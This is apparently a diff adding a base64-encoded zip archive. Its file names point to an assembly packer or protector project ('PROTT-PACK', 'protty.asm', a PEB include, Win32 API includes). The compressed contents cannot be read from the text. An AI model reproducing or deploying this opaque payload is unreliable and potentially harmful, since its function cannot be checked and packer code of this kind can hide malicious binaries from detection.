+011f4W/T9b7oyncEiAbUOwSPwGcLQkRICLlKirUDVmggHeobJl0Fm8A0gWkK
+JWsC2wS2CWxTlslNV2QZIAtkg6hZhMTI6aqhA68Dr+MEOB04HThd3WHnWZgP
+LE+KDDtRiSPxpltV0HHsGWXFwhgZE2OmvnV3XeK6TKYcqqH2Sn8oSvfVox1f
+46vwnbyDtGSB0r38GEVujAZkaSANRGuORGAa+WowjWAaU3UwRe7rD2KADJAF
+sq45mIbm0O+Fn0E5g3LG5mbQub7+Dp1nUZ449FWTwHGxshhcnviL9gurXlj2
+kpr9qW5kpvwaiTgRZ+LMogm3/ybzxy+3SoFjqOpKL6CSQzM4TlOPw9TjLPVW
+/F50xrIBqRpI+2ZrCjg0g4NkAslkqrdttbvBMgNkgSyQ9AeatmsCDiVVvA1K
+B0qHfTlbXd55qUfsQhx8k2u4yBq7nXRibHaOyM4R2TmibVZnTmJ+Is7EmWYa
+/ivuX5/Ew6a6VNQDGoAGIOmxfZOPraH2Q41taKzVqE0jQZptEh1LVzBAJolD
+JVV0ZGdARRZMFsssmCx9aapDRb5mKM8dex6s0nH7nZLSGKhToE7BNBOzywZm
+lr6bdkoSJ9FDjm3r4cWmoqc0Br4h8w2ZOZnsOf3PxUVomW4OBRqAhtwU5LXm
+qk917bIaB0vHqrFGwogEaQX0KZABMllkLELzfnPVtezDFnQ2VqEtEmakSiuo
+qY4H13PbnrjoJ3edK75tbTgsTed40Tkws9xvuTj20nSJU2vxed4p6Zp7pQ13
+mQ0mx4vOObe7skiOe/DP2/aRwBbL88+7bQDDEKu9Kb18JPAOm+rRx8jgOb8P
+2F15/nmjGZCYWE0tgtdU6ipfCrzCeP65Y0+vSGOVsy9XmW+6+XhxdlFcHCwt
+Vb4X5OKSDhDblcWxfCJIY5UOIFdZom4pXpy9U3y6aNpcu839qp7U2+t6Tmp9
+Of5Q50NSz+vprJb1+Xl9uVFHv3xVa97GMZ3UIb0mdVjf0vf0yuQNvKi3p/Nh
+/ee8JT+d1NmHY+Jy9ba+fj2pb+k1p+V8/FFPyh+/Pzze//354fHz3f1vD3Jo
+7j4cbrYWtTEe13gK79PpaeN/J3Mf93Nvv8SfZ7cDuh2XbfZ5/S6Z71PczU/7
++ZL984q7jd9ixem8gmE/d7+fY/ZuFp8KG9wH/P0LUEsDBBQAAAAIAHxTwTLh
+N3AbfgEAANICAAAtAAAAUFJPVFQtUEFDSy9wcm90dHktY3VycmVudC9zb3Vy
+Y2UvcHJvdC9wZWIuaW5jfVFdT8IwFH0uCf/h+qbBwfDjBfxgwEAMAoFpNMYs
+7XphTcZatyL6720nKEZDX3p7zz3nnnvbdBwHZoE3De4nM5j4bZhMx4HfCQbj
+ETh7T7nULIqDJ3vdGg44EGVINXJgHzARUmfQpqmgcMHsVVU21VosqUiqkVxe
+WYlYa9Wo1RSr5gojQRORI6+KdC4Nut/Bfnfl0si782fh0B/1gxtC8HUFhLju
+ydl5r+fGjo3qvufGJtuEQ0zlahEfXB9ZpkIWqkxqjDQhJohskqhVHlNughbH
+RNOTDBeATBXYUr4B0vdjvpYZB2Umn+eN51M3fjHivvcIIodUrosVM5rjv5Rn
+86y40ZZTcTsxXFpKOOxOw64XeFtaLo5N7U9n9lsmF5W6kTHoL3N3Xn/QCa3e
+gze89w2SSg2FEIloksA6ExpDTVmCIaY6+ygUisE3ZVsp03EfyZbtGmKqMh52
+beuXL+NESQW7I3yb3uBfJcW6M9R/PgVTXiy+XNroEs7BJYR8AlBLAwQUAAAA
+CABIiI4ydt4TyT4CAABeBgAAMQAAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJl
+bnQvc291cmNlL3Byb3QvdXNlZnVsbC5pbmOdU9uO2jAQfQZp/2G6T63KJYCE
+VlAqIEmXruiCAl1RVRUy8UAskjgyTpf262uTACmkkUry4NHMnHPmYner//fd
+lbvwwoSMiT8VXKIr374D3KMbSy7eqOgNfPZg0Xv1UCDUwTYXvR37fTCtRW/q
+TOa3kWrk/Js+nmxzDlVwBRKJFFa/YMq4FDAkISPwYaWPWqRd/U1AmF9zefBR
+U3hSRp16PVrVdhG6jPhsh7TGwjW/paS7ckC2uIzU1Eqlkjrcu3Ipinceocro
+U/QlaQrcAK4i5XCJ70O/v1cmpWDolP6+k0IA6f5kumeT7I9I+soFhUi1+V3x
+vV/+vbMfms710N02wajc20Jw0bne61pNA+m9pufRoUyB8rITDGmkffrvBpyy
+NVNTFiSkPIAwDlYoYIMhCqJuiNoDF2zDQuLrRchq0zAMjUzylzuUcXQaz6FK
+1c0eHlHOmbs1eRyqAkoB/wlOgpgh0krSeFrcBdWxvky+8iYzPSUrgowqXHzT
+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
